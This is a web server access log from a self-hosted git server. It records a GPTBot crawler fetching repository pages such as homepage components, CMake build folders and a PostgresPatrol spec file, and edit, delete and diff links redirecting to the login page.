"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14712] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:52:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:52:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14711] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:52:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14683] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:52:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:52:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:16:52:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build" -[17/Feb/2026:16:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10051] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:16:52:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" -[17/Feb/2026:16:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:16:52:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:16:52:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:16:52:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16419] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:16:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:16:52:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 12585] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:52:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9952] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:52:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:52:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:52:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:52:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:52:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:52:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:16:52:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10645] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:52:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10644] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10303] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 